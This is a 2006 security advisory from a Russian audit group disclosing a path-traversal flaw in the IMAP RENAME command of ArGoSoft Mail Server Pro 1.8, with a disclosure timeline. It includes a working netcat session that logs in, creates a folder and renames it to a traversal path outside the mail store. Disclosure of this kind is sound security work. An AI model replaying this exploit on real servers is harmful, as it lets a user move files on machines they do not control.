Advisory: NSAG-№200-24.02.2006 Research: NSA Group [Russian company on Audit of safety & Network security] Site of Research: http://www.nsag.ru or http://www.nsag.org Product: ArGoSoft Mail Server Pro 1.8 IMAP Site of manufacturer: www.argosoft.com The status: 19/11/2005 - Publication is postponed. 19/11/2005 - Manufacturer is notified. 14/02/2006 - Answer of the manufacturer is absent. 14/02/2006 - Publication of vulnerability. Original Advisory: http://www.nsag.ru/vuln/878.html Risk: Hide Description: Vulnerability exists because of insufficient check of entrance data of variable RENAME. Influence: Removed user, is accessible to move files, to an any place on a disk. Exploit: M: \> nc.exe 192.168.1.1 143 * OK IMAP Module of ArGoSoft Mail Server Pro for WinNT/2000/XP, Version 1.8 (1.8.8.1) 0001 LOGIN "testuser" "test" 0001 OK LOGIN successful 000P CREATE "testfile" 000P OK Folder created 000G RENAME "testfile" "...\..\..\hackuser\hackfolder" 000G OK RENAME completed More information: http://www.nsag.ru/vuln/878.html ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ www.nsag.ru «Nemesis» © 2006 ------------------------------------ Nemesis Security Audit Group © 2006.
